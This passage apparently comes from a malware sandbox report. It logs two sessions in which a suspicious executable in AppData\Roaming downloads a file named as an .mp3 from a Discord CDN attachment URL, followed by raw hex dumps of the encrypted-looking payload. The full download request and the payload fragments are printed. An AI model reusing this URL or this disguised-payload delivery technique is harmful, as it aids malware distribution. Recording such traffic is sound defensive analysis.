2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 36 8e 81 2f ab 60 ef 9b 84 e2 ae ad df 63 09 b5 56 39 1b 4e 6a d2 a9 7a 7a 18 35 a2 c3 b1 ac 0d 4f 7b 36 79 65 5d c7 4d 20 6f fe 68 0d 3f 8e 03 a6 65 2c a1 77 50 33 31 f5 a4 43 70 4e 8c f4 ed 08 96 0e a8 40 99 b6 b3 3a 70 d6 a5 a6 7a 86 4c 8d 4b 31 56 9d ab 4b d6 41 bf f6 88 1d 88 61 10 8d 1b 7f 8d 90 a5 ee 53 cf 69 48 3a 7d 4a 71 69 bd da 78 69 b5 34 9a 44 2a 4e a4 e3 64 d9 33 a6 e7 aa 2b 33 b5 fa da a2 22 33 fa e9 54 db 40 12 07 6e 42 e5 c1 7f 05 07 fe 54 12 f1 22 72 c4 39 89 fa d6 9a 06 d0 5b e3 72 8f c9 d7 e8 23 ef 19 b0 47 db 7d c3 14 7d 62 5e b9 97 be c5 97 ec 3e dc 03 51 2c 97 42 ed 33 1e 53 00 26 5f f9 a4 94 61 31 26 1b 0a 5f 12 7c 7b 44 72 5b a0 61 48 8b 02 e0 4c 9b ff 99 fb b0 7d 7e 44 b7 8a 5a 10 e2 32 ef eb d7 60 75 92 e8 af fd 01 04 ac d0 fa Data Ascii: 6/`cV9Njzz5O{6ye]M oh?e,wP31CpN@:pzLK1VKAaSiH:}Jqixi4D*Nd3+3"3T@nBT"r9[r#G}}b^>Q,B3S&_a1&_\|{Dr[aHL}~DZ2`u
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: e3 0f 99 a4 bc be 51 da bb d6 6d 37 af 30 6c 8d 3e 49 a0 f7 f8 1b ea 4f 4d 17 b8 94 48 e3 45 7d 74 9e ee df 58 a4 7f 62 ca 29 7c bf 0a 0d 6f 6f 22 84 fc 84 54 b2 a2 ff 78 f0 4d 1f 02 8b 82 e5 60 d4 2c 49 a5 3d 74 70 7f fb 51 c1 37 18 48 11 63 a3 11 f4 93 81 0d d9 43 fa b2 6c 01 2e aa 2f da a8 32 88 c6 55 87 c2 eb 40 46 bd 31 ae 6e 4d 6a f5 7d 7f 0d 5d 92 03 50 bd 93 eb 41 eb 6b f4 4b 4b 90 29 6f 50 1d 9a b6 18 46 85 af df 56 c2 b1 2a 8d 13 9e 6a bc 83 e7 0c aa 2d 12 dd f8 56 9e 96 76 f1 28 c5 9a 36 5c 51 3d 29 7f ae 7b 11 64 89 1b 66 63 c1 8c c1 21 3f 82 ba 49 60 e2 0e 8e 77 16 9a 4b 3c 5c da ba a6 e5 66 7c 5d 79 05 14 4a 3d 43 3e 5e 1c f4 00 f3 50 f6 13 6c 20 d4 c5 4a 27 e5 34 5c cc 02 9d d3 78 a5 4c 2d 6f dc aa c4 54 ce 3a db 50 cb aa b6 81 f9 93 3d b8 Data Ascii: Qm70l>IOMHE}tXb)\|oo"TxM`,I=tpQ7HcCl./2U@F1nMj}]PAkKK)oPFV*j-Vv(6\Q=){dfc!?I`wK<\f\|]yJ=C>^Pl J'4\xL-oT:P=
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 09 b9 9b f6 4c a4 dd 69 a8 71 80 73 cb 51 64 42 ec dd c0 70 70 2c fd 2d d7 a6 85 73 38 b5 8d 15 cf d8 ed 57 d7 ec 7f 7f 1a 46 65 81 4d c7 22 c3 10 9a 46 ea 3f 43 14 15 02 18 6c bf 5b 80 b8 d4 08 c8 49 a9 74 fe 87 9d d2 dc 82 e3 ae fb 18 a9 49 59 e9 85 96 73 e4 12 82 bf 1e e6 95 04 47 2e ae 5f ed ab a4 b8 4e df ee 5f c6 eb f2 07 e6 be b4 d5 67 f0 0c 65 43 12 a3 b1 1f 3a 69 73 65 6c c3 8f a9 12 77 b2 6e 00 56 94 8c ad cd 21 c1 92 3f 37 a7 9e 06 2c 12 b0 2c 33 a1 b9 58 5b 8e 0b 7c 6a f2 f7 60 81 2e b7 13 bb bb 90 b2 6c 16 7f 3b f9 d6 bc 92 70 2b 5d 33 d6 ac ff dd ff 56 38 34 3e 95 fc 31 8b 04 28 1b 39 6b 0f 73 5e ef 7a 18 23 94 0f fb c8 d2 4d dd 2e 6b 24 f1 44 87 46 36 b8 c5 77 f2 3d ce 14 af ea 02 dc 2d 01 9f 81 a3 0d de eb d1 61 cc b9 46 71 4d 3a 8d 55 17 Data Ascii: LiqsQdBpp,-s8WFeM"F?Cl[ItIYsG._N_geC:iselwnV!?7,,3X[\|j`.l;p+]3V84>1(9ks^z#M.k$DF6w=-aFqM:U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49721	162.159.135.233	443	6136	C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:32:46 UTC	227	OUT	GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2024-04-11 09:32:46 UTC	1176	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:32:46 GMT Content-Type: audio/mpeg Content-Length: 2229256 Connection: close CF-Ray: 8729f8a66a974372-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 45 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="Vfjvqmgnpj.mp3" ETag: "31c4b15339efe268f1d2e052670a4eae" Expires: Fri, 11 Apr 2025 09:32:46 GMT Last-Modified: Wed, 10 Apr 2024 06:31:31 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1712730691571736 x-goog-hash: crc32c=c+eJDA== x-goog-hash: md5=McSxUznv4mjx0uBSZwpOrg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2229256 x-guploader-uploadid: ABPtcPoX1GYNJyRhWEbwiN6HhNYbkhoKKgTnfHpGaJS8ORtE51yNb37360Sgs9IzkLH4QGYw1NY X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=wkHIfN56k2mIErH9bpequx5xEyL2OxyL4Lc4_HorJ8A-1712827966-1.0.1.1-V2k34Jv2C60ICkqzzBMGrL6YJNozREQiNMaRTaO1_Z66.qr52DKLn8UkA6Rhsnx_uB7.YtPtIAR_ohM9lIxF7g; path=/; expires=Thu, 11-Apr-24 10:02:46 GMT; domain=.discordapp.com; HttpOnly; Secure
2024-04-11 09:32:46 UTC	517	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 46 6b 6e 4b 53 47 6e 4d 64 6b 51 74 52 70 41 6f 79 61 39 4b 36 30 25 32 46 41 70 73 42 68 5a 50 71 4f 5a 62 5a 33 67 49 38 64 7a 4c 64 58 68 35 76 77 32 4d 54 44 70 4b 4e 77 59 6b 39 4e 58 67 53 47 6b 68 65 6c 69 6d 62 4e 49 34 77 68 56 69 4a 4f 58 69 25 32 42 41 70 79 6e 58 51 50 49 6e 5a 6a 59 50 37 42 59 68 78 30 58 6c 78 70 35 41 31 66 78 31 46 25 32 42 34 54 4d 75 67 45 42 64 34 4a 25 32 46 4a 30 62 4b 38 75 48 52 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FknKSGnMdkQtRpAoya9K60%2FApsBhZPqOZbZ3gI8dzLdXh5vw2MTDpKNwYk9NXgSGkhelimbNI4whViJOXi%2BApynXQPInZjYP7BYhx0Xlxp5A1fx1F%2B4TMugEBd4J%2FJ0bK8uHRg%3D%3D"}],"group":"cf-nel","max_age
2024-04-11 09:32:46 UTC	1045	IN	Data Raw: f2 67 86 93 29 46 50 32 a4 ed 8f 78 59 11 4b 2d cb de 1f 15 38 1c 2d 9e 76 d3 c6 85 57 6d b7 d3 96 96 19 ba 8a 86 18 58 3b 22 a3 77 59 ba 02 bb 75 b3 63 67 b8 47 5f 87 35 7e 76 53 a7 b7 80 bd 59 6d 51 b4 e5 9f 87 2a 48 15 91 a5 0e 9b 09 b8 b5 17 13 84 32 b2 16 ca f5 4a 89 0c be 5e fd 88 de da 0e 2c 09 13 eb b9 fb e7 02 b6 de ed c7 d6 c1 39 c0 36 5b c6 e1 4d dc a3 89 6f 6a 9a 05 6e 27 26 a7 4b 19 08 12 64 37 62 71 bc 57 26 19 bc 6e 47 17 04 ae ce a9 f6 7c d9 e7 de fe 53 97 94 f3 00 41 62 1c d1 04 c9 3d 1f 78 3e 09 52 e0 27 c6 1c 7c f9 68 6d 0a 50 f0 7a c5 4b 3c 1a be a1 1e 74 4c ee 3e 15 a6 5f fa a5 f9 6d 4e dd 93 38 1d 3c dc 9a 63 1e 5d 37 ca 1f 74 63 58 86 e0 7f 4e 31 30 db 69 99 81 96 48 d2 0d 25 08 98 36 9b fd a8 1c a2 ea a3 a8 22 aa 42 89 d9 ca 14 0b Data Ascii: g)FP2xYK-8-vWmX;"wYucgG_5~vSYmQ*H2J^,96[Mojn'&Kd7bqW&nG\|SAb=x>R'\|hmPzK<tL>_mN8<c]7tcXN10iH%6"B
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: be 20 11 dc 66 cf c3 2c 1b 9e 5b b1 17 80 ee b9 42 07 5e 46 bf bb 23 d2 a2 bd da b5 93 fd 90 59 cb a0 d6 9c 42 d5 1a e1 66 c0 dd 42 fa 22 1f ba ea 06 93 39 fe 81 40 4c 62 67 dd 8e eb 6c 1a 89 c4 28 bf 9e c8 b9 01 ca 69 7e df 59 73 75 36 62 4b cb 83 ed a6 1c ec 69 e7 36 f0 d4 04 69 73 de e7 55 4c 0e 3a 0c 46 de 41 d5 41 c0 2a 27 c3 aa 9f e0 19 5a ff dc 14 fb bd fd 01 2b ef 44 f5 62 44 71 aa 37 ac 50 66 bc 84 1e 72 06 9f 3f bc c0 ec ce 72 35 eb 7f ee 3c 30 d5 c3 1b 8b 10 0b 1c f2 07 b4 a8 11 e0 b0 a9 4a f7 db 05 66 20 42 ae 72 ab c1 5d f3 a5 aa 09 41 a7 51 99 e1 9a 0a ab 38 80 65 bc 8e 1f 20 b0 70 a2 fc ef 30 b0 33 68 5c 6f ce 67 34 65 a9 14 74 a0 0b 0d c8 db 55 84 44 69 02 ca 31 4f c6 7f 1b 01 d2 c7 af ba 82 80 d3 6c cf 6f 6e 69 e2 5d 55 f4 1a 3f a2 57 e5 Data Ascii: f,[B^F#YBfB"9@Lbgl(i~Ysu6bKi6isUL:FAA*'Z+DbDq7Pfr?r5<0Jf Br]AQ8e p03h\og4etUDi1Oloni]U?W
2024-04-11 09:32:46 UTC	607	IN	Data Raw: e2 b5 d7 22 c6 af c1 69 01 10 89 3a ec 30 64 da 3e e1 a7 98 f9 f7 30 1c 64 ea 59 bd c5 b2 6b 20 45 30 44 02 6a b5 73 e6 bc 06 4e bd 9d 69 38 60 47 8a 0c 33 17 0a 60 85 4b 6a fa f5 e4 29 36 e6 9a 05 45 cb d1 fa d7 51 67 2b 58 95 f4 cf 2a 76 44 9c 52 23 83 f0 70 9a dd 50 fe 41 49 9e a3 ae 5e 2e 1f 0d 0e 81 b7 e9 df b6 12 62 0f 6f e8 88 00 61 0a 5f 41 db 2e 9b 99 ce a0 0c e0 ee b9 e2 36 e1 fa c1 fc e1 b0 c5 75 5f 16 33 51 5b 5a 20 98 7b ea a9 c6 d0 48 ed e8 59 11 9b 9e d7 00 da 09 ff 12 4b 07 ad ef d9 4e 73 7b f2 26 42 f6 bf c1 ad 0c e0 6f f2 1f ba 21 6f e6 49 28 17 d1 98 21 26 0c b6 02 16 4f 4e 8b 01 ed 91 7f 8a dd 67 e0 7b b1 a3 b4 6a 0d f9 82 dd 7f 44 a6 04 97 b2 81 ee 69 a9 a0 91 48 80 0e 26 d5 c8 67 0f a5 a1 c9 11 4f 6f c2 be 8e 3a 8e 33 be 8e 06 30 a1 Data Ascii: "i:0d>0dYk E0DjsNi8`G3`Kj)6EQg+X*vDR#pPAI^.boa_A.6u_3Q[Z {HYKNs{&Bo!oI(!&ONg{jDiH&gOo:30
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: 63 43 63 fc b5 72 28 fc 79 e0 0d 0e 78 ae 59 a4 3a 92 04 2c b0 a2 1c 63 4a 7c a2 c2 0a 5b 0b 5c ca b8 a9 18 ef 0b da da a1 da e7 5f 6c 53 14 01 0c 1d 38 ea ac 4c 97 48 4c 60 bb 8f ad 0e 55 81 86 10 64 4a 49 7f 62 41 d8 fb 89 51 2a 96 59 1c 6a eb 03 e4 11 1c ba 74 85 32 4f 36 28 5a fb f4 5b 28 cf a1 b8 6d 62 ee 99 c7 0b 89 3d dc 59 76 aa 68 00 10 ac 8f 6e 64 1e db 8d e0 c5 19 ce 4d 44 7f af df b0 23 64 4f c2 d4 28 36 c8 83 85 d3 c5 49 0e b9 97 de 49 f1 c9 70 1b c5 ec 97 54 78 d2 1e 9b a4 67 8d 15 27 5e 62 d8 7c 89 ab 18 d1 51 8a 76 c7 f7 fd c4 68 f4 4f a7 50 cd b0 2d ec 3c 4d 32 b6 9c 37 23 bc 3d c1 41 30 a7 b3 be 50 3c b9 6b 35 b7 d6 3d 4c d7 19 8a 4c 45 36 9a 71 1f 52 1f 3b 6d a0 a0 a8 85 7d 09 51 0b 8c 81 3a dd ce 29 97 53 6f d2 25 58 f8 56 92 cc 43 55 Data Ascii: cCcr(yxY:,cJ\|[\_lS8LHL`UdJIbAQ*Yjt2O6(Z[(mb=YvhndMD#dO(6IIpTxg'^b\|QvhOP-<M27#=A0P<k5=LLE6qR;m}Q:)So%XVCU
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: 85 c0 3a 41 67 e6 90 2a 52 64 83 bf 28 a1 f0 22 52 50 f5 e3 0a f0 aa c7 88 08 79 2a 5d 04 95 e5 aa 69 2d 03 40 78 1d a8 f0 fb 9c a0 51 c1 1f a9 9c e9 6e cb 39 21 5a 15 04 57 5d f2 b4 46 ff ff 8b fe fa 93 a0 e4 90 df b0 02 23 b8 16 12 e7 be 14 de bb a0 60 c9 03 e0 82 84 93 1d 39 82 5a c8 aa df 52 02 ac 3e 76 81 84 82 3a e4 8e 1e 46 c5 26 4f 07 74 9e 42 77 94 a9 be bb 47 11 f4 8d 99 11 89 ec 9e da 74 6c 0a 45 8b 4d e1 3b 82 1e b1 f5 a0 42 96 29 cf 6c b3 3a f1 3b 40 c3 e5 3d 30 fb a4 9b e1 de 2d 21 e5 c5 bc f7 87 19 5a 8d 6f 9a 9b 3d 6c 1e 8f 1c da 13 2f ee 23 74 78 6d 61 07 b9 e8 75 13 58 94 dc 1a 71 9a 36 eb 32 f5 b5 57 7c 21 72 45 be 18 df a5 5b 76 a3 5f aa 52 b6 21 4b d6 58 91 b3 25 f6 b2 80 f0 25 41 ee 28 1d 86 97 d9 05 b0 16 32 ae 4e 11 23 3f 4c 69 4b Data Ascii: :AgRd("RPy]i-@xQn9!ZW]F#`9ZR>v:F&OtBwGtlEM;B)l:;@=0-!Zo=l/#txmauXq62W\|!rE[v_R!KX%%A(2N#?LiK
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: c3 d9 d3 e1 91 2e 8a af 77 33 31 10 30 2a 64 0a e0 81 9c 23 17 55 4d 96 6f c1 68 f5 d5 ea 8f f1 92 8a 2a f4 b6 ed a2 f3 d3 89 19 34 87 d0 4a 57 05 73 83 9a 1e c8 97 79 d7 a3 e8 5e 33 3b 44 b7 75 68 19 9a 9a 26 ef 86 ec 52 ca fc a1 6c 0d 8c c7 58 55 d6 1e d6 5d a0 53 a0 72 23 70 30 ed c7 44 7f eb 9b 1c 64 f2 5b d5 4c cc 2a 92 6d c0 69 8a a9 bb b8 5e 27 bb 12 1d fe 4f 46 07 40 67 84 bf 1a aa 6d 27 ac 2e 8c 0f 72 95 66 4b 08 bb 63 fd 08 ae d7 39 1a c5 d5 a4 64 a0 9c 49 7f 23 9a 49 f4 35 6a c1 3b 8e 32 c6 72 82 2b 70 c3 1f d4 64 17 23 09 cc 67 2f e4 42 0a ce d9 74 66 dc e7 44 b0 71 2a 94 4b d3 3a 46 b5 ba 6a d3 ce 41 23 b7 78 2e 2f e8 e9 59 6a 1b 63 9c e7 fc 5f 7f e6 71 97 25 58 61 be c5 eb 9d 51 33 a2 f2 81 7a 6d d5 2d 8f ab 02 20 24 8f 32 e5 40 6d 0f a7 da Data Ascii: .w310d#UMoh4JWsy^3;Duh&RlXU]Sr#p0Dd[Lmi^'OF@gm'.rfKc9dI#I5j;2r+pd#g/BtfDqK:FjA#x./Yjc_q%XaQ3zm- $2@m
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: 2f 47 04 cd 77 ed 45 5e 74 58 48 a1 a8 f7 39 e0 b4 e6 99 58 ca 11 8c 52 b0 31 8f b3 04 4c 74 2a d1 bd 2c ea e9 f4 75 67 f8 4c f1 e2 d7 3d 7a 63 40 c3 57 34 4e ba cf 23 4c fc 4f 5e 3c 69 bd 0b 6f 78 35 61 8f 05 13 44 52 d0 78 b9 03 28 7f 0c d1 1b ee ae 77 1a d8 36 70 bb 81 2e 48 bb cd e8 e7 92 25 db 4e c6 9e f2 d2 a7 1d 42 80 92 5d 3d 9c 5c dd 63 57 72 08 ca 55 39 6f 59 63 76 a7 19 a0 84 ce 27 7f fe e4 4e 48 7a d1 08 a6 79 66 ab e6 78 14 64 b2 50 2c 9b 26 09 63 f8 07 c7 f5 39 a9 0e f8 05 14 5a b1 52 fd 0a c2 57 d4 84 ce bd e1 9f be a6 c9 28 db b1 e8 46 7f 19 ec 31 5c 40 36 b5 93 b4 f2 77 d0 98 96 0c cd 09 01 6c 63 9b 91 86 32 e1 23 d5 1d ab ba 6b b7 6f 7a f8 ed 18 9b 46 01 87 90 a6 71 b8 23 29 b9 e9 c7 88 c6 a8 ad 06 cc aa 30 e2 94 d8 fb e1 31 a3 4e 8c ba Data Ascii: /GwE^tXH9XR1Lt*,ugL=zc@W4N#LO^<iox5aDRx(w6p.H%NB]=\cWrU9oYcv'NHzyfxdP,&c9ZRW(F1\@6wlc2#kozFq#)01N
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: e6 f6 62 dd 2d 0b 03 6a 10 e2 dc 05 8b a1 ce 6c 7c 52 23 a2 ff b4 26 c2 da 7b 5d db 49 84 23 dd 27 0e 5a d3 b6 ad cd 7f 80 37 6e 29 0a e4 d2 fb 1e 72 ed f8 86 a2 c0 e0 e1 71 db 3b 7f f9 02 1e 53 12 cd d6 9d e5 64 53 02 58 35 cb 25 41 8f ad 20 a4 84 21 22 e3 dd 6f d3 f0 cc 33 e0 a8 49 38 49 a8 0b 9b 15 4b 4c f8 4f 2d 3d 8d 1c b4 0f 8a 2f 3c 38 70 bd 23 61 ce b5 20 f1 8f 37 64 84 bb 58 8d 50 72 31 cc 75 0f 5e 54 5f f7 36 45 08 76 78 13 04 dd e0 f5 df f1 58 9c 21 97 77 df cc 2a d1 0a 88 1d a7 10 ac e9 d6 00 bb 38 c8 1c 7c 5b 18 cc 58 d2 0a 55 7d 70 95 48 78 ee d0 27 38 e6 50 c7 1a 7b a7 5e ef 29 cf 90 4b 4d cf 61 7c 2b d3 ac 99 db 92 d0 7e bb b2 6b cc 00 3d 28 32 0c a0 3f 4e c7 fc 39 8e 20 94 ad 78 c6 f5 1a ad fb 43 1c 16 dd 89 f4 b7 d6 cc 96 c8 22 43 35 40 Data Ascii: b-jl\|R#&{]I#'Z7n)rq;SdSX5%A !"o3I8IKLO-=/<8p#a 7dXPr1u^T_6EvxX!w*8\|[XU}pHx'8P{^)KMa\|+~k=(2?N9 xC"C5@
2024-04-11 09:32:46 UTC	1369	IN	Data Raw: e2 5d 6e 53 f9 92 fa 02 96 3f c9 dc 7a 5b d3 12 a3 9a f1 a2 dd 98 29 6e db 29 54 da 53 2f 45 72 e6 65 95 44 c5 52 56 bd 80 1e 18 25 2c 16 2e cf 0d 9d 1a 5f 69 56 d1 07 6a 87 f4 6b 2d 36 ba 8f ec ff cd 4b c3 e3 41 be 4c d8 0d 89 bb 6c aa 53 44 dc dd 5a 1b d5 a1 50 96 21 10 3d bd 3a 97 63 f9 04 25 de ac 0f 0f 32 62 e1 62 ba 3c 31 a1 9e ee f4 f1 c2 2c e3 f3 9d bb ea 70 72 49 8a 18 37 83 0e 70 9d 68 a3 3c 60 ce be 20 01 f5 6f 25 79 44 a1 8a e3 72 c6 36 10 57 9c 64 1f bd a9 48 53 0b 97 44 aa 64 46 c4 35 2d d9 ee b8 d5 71 22 8a 5f a2 0e 70 00 f1 f8 46 df f5 00 f2 be f4 a4 90 38 45 15 da b4 27 ca d2 80 b5 8e bf 90 61 85 07 1c 3f d9 1b 36 fb 38 7e b1 0c fc ab 6f 71 56 f8 c9 ea 70 08 3b e1 4f 71 29 5e 8f df eb 21 2f 23 86 fd d4 1d ec 69 b0 8f 46 61 18 e4 e0 a0 63 Data Ascii: ]nS?z[)n)TS/EreDRV%,._iVjk-6KALlSDZP!=:c%2bb<1,prI7ph<` o%yDr6WdHSDdF5-q"_pF8E'a?68~oqVp;Oq)^!/#iFac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49730	162.159.134.233	443	2608	C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:32:55 UTC	227	OUT	GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2024-04-11 09:32:56 UTC	1176	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:32:56 GMT Content-Type: audio/mpeg Content-Length: 2229256 Connection: close CF-Ray: 8729f8e1ee258c1e-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 55 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="Vfjvqmgnpj.mp3" ETag: "31c4b15339efe268f1d2e052670a4eae" Expires: Fri, 11 Apr 2025 09:32:56 GMT Last-Modified: Wed, 10 Apr 2024 06:31:31 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1712730691571736 x-goog-hash: crc32c=c+eJDA== x-goog-hash: md5=McSxUznv4mjx0uBSZwpOrg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2229256 x-guploader-uploadid: ABPtcPoX1GYNJyRhWEbwiN6HhNYbkhoKKgTnfHpGaJS8ORtE51yNb37360Sgs9IzkLH4QGYw1NY X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=fjspixUxypNIS4LBuDtw1_L_wh976JW2EdXrEKBOyXg-1712827976-1.0.1.1-tQBVuj.czxcC6034IsGVIKc38ay3Lsu0n8EmJooGrvvQs4UNubVIglIsIYj_X9m3ISxPLOAcwKu5YvOKdZVD0w; path=/; expires=Thu, 11-Apr-24 10:02:56 GMT; domain=.discordapp.com; HttpOnly; Secure
2024-04-11 09:32:56 UTC	521	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 38 75 32 58 32 66 4b 42 53 58 64 67 5a 71 64 68 38 64 4b 73 62 6b 79 66 74 4c 63 34 31 6d 25 32 42 73 68 71 76 5a 6a 4d 4f 66 77 32 70 53 62 68 25 32 42 53 25 32 42 72 44 57 61 70 6c 75 78 50 64 6a 53 37 79 44 41 6e 33 52 5a 37 78 6e 75 73 34 50 36 64 6e 30 56 59 72 37 4b 6f 4d 55 42 4d 59 6b 45 6b 73 72 64 46 54 56 42 7a 66 25 32 46 55 54 62 64 59 43 25 32 46 55 69 41 70 6c 46 37 7a 69 4f 39 6b 51 44 6f 49 52 25 32 42 78 4b 57 54 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8u2X2fKBSXdgZqdh8dKsbkyftLc41m%2BshqvZjMOfw2pSbh%2BS%2BrDWapluxPdjS7yDAn3RZ7xnus4P6dn0VYr7KoMUBMYkEksrdFTVBzf%2FUTbdYC%2FUiAplF7ziO9kQDoIR%2BxKWTw%3D%3D"}],"group":"cf-nel","max
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: f2 67 86 93 29 46 50 32 a4 ed 8f 78 59 11 4b 2d cb de 1f 15 38 1c 2d 9e 76 d3 c6 85 57 6d b7 d3 96 96 19 ba 8a 86 18 58 3b 22 a3 77 59 ba 02 bb 75 b3 63 67 b8 47 5f 87 35 7e 76 53 a7 b7 80 bd 59 6d 51 b4 e5 9f 87 2a 48 15 91 a5 0e 9b 09 b8 b5 17 13 84 32 b2 16 ca f5 4a 89 0c be 5e fd 88 de da 0e 2c 09 13 eb b9 fb e7 02 b6 de ed c7 d6 c1 39 c0 36 5b c6 e1 4d dc a3 89 6f 6a 9a 05 6e 27 26 a7 4b 19 08 12 64 37 62 71 bc 57 26 19 bc 6e 47 17 04 ae ce a9 f6 7c d9 e7 de fe 53 97 94 f3 00 41 62 1c d1 04 c9 3d 1f 78 3e 09 52 e0 27 c6 1c 7c f9 68 6d 0a 50 f0 7a c5 4b 3c 1a be a1 1e 74 4c ee 3e 15 a6 5f fa a5 f9 6d 4e dd 93 38 1d 3c dc 9a 63 1e 5d 37 ca 1f 74 63 58 86 e0 7f 4e 31 30 db 69 99 81 96 48 d2 0d 25 08 98 36 9b fd a8 1c a2 ea a3 a8 22 aa 42 89 d9 ca 14 0b Data Ascii: g)FP2xYK-8-vWmX;"wYucgG_5~vSYmQ*H2J^,96[Mojn'&Kd7bqW&nG\|SAb=x>R'\|hmPzK<tL>_mN8<c]7tcXN10iH%6"B
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 60 af af 50 7b f2 2e 37 55 35 85 31 ad a9 6d fc f1 78 cc 4b d3 8d c1 45 fc 08 12 30 70 81 46 fa 88 49 a4 d8 41 6d fd 74 25 b5 86 ef e4 c6 3b 54 d6 b6 d5 08 7e 43 1f 92 a7 7c d0 95 0d 42 11 50 b1 2d 77 e0 5c 8a d6 89 2f 5f 5b c5 c3 b2 9c 89 97 7b 8e 9f ad 4e 65 31 99 5b c0 ee 39 bc 04 7e 9b 99 2f dc 57 8f bf af 76 b0 da 54 a7 60 b3 f1 c4 72 de 2b fe a0 06 3b 8a 94 37 c0 1d fe 41 b7 67 2b 60 1c 6e b9 6c 68 08 d6 40 2d 4f 17 87 cc 84 63 ca ca 7d eb 7a d3 25 58 a1 e9 47 76 3c f8 3f 51 1b 63 07 90 63 eb de c1 f1 11 63 08 5f 0d d0 4d 3e eb e9 60 25 6f 32 55 a9 53 a3 ea 34 c0 58 0b 7c d7 04 56 39 16 62 8c 1c de 71 b8 84 09 60 46 0e c9 4c 44 7f 65 06 02 4e eb 10 cd 71 d4 7d 66 ae 8d 71 a2 ed 5c cd 44 d5 44 19 d0 b1 55 84 ba f5 c1 cf 5b f2 36 43 ca c7 1c 7e 49 f4 Data Ascii: `P{.7U51mxKE0pFIAmt%;T~C\|BP-w\/_[{Ne1[9~/WvT`r+;7Ag+`nlh@-Oc}z%XGv<?Qccc_M>`%o2US4X\|V9bq`FLDeNq}fq\DDU[6C~I
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 4d 52 fc 1d 13 5a 15 14 ca 41 4d 60 36 1e 9e df 01 2b 36 2e 71 b9 04 65 9c fc 4f 59 ba 75 2b 1e ce 7e 16 cf c2 93 f5 67 72 40 d5 29 6e cf 74 62 5e 2d 05 af 9d da 86 19 7d 9b b9 84 38 b7 fb 83 5c c3 20 10 4f e0 d1 fe a3 8a 56 c8 ec ec 9f 62 c8 e3 6e d1 25 f6 39 70 16 9a 61 fd 8c 36 bf 7b a6 b3 58 ec be fa 71 9e 66 bb 33 e4 72 75 89 0f 8b b9 d7 95 36 8f 25 51 c0 54 0a e4 b0 26 c7 d1 6d e9 55 0e 99 10 39 38 d4 ab 54 e8 86 2b c1 c1 f1 62 b0 13 c8 a7 04 5b ee e3 45 d5 27 fe 8f c1 17 0d 80 7a da c1 88 2b 66 f7 77 18 9f 50 03 ea 71 26 6b b9 03 cc dc 28 50 f7 d8 c6 43 31 a7 e9 34 6b 94 e5 76 73 6a 65 81 a1 67 25 24 27 7b ed ed 5b ae 7c 90 df d7 a5 fa 01 a8 5e 65 bf e7 db 4b 28 41 ab 29 11 1f 66 8c f6 62 40 14 6e c3 0a 40 05 1b aa 38 e4 16 83 a0 be 50 dd 3a 18 5d Data Ascii: MRZAM`6+6.qeOYu+~gr@)ntb^-}8\ 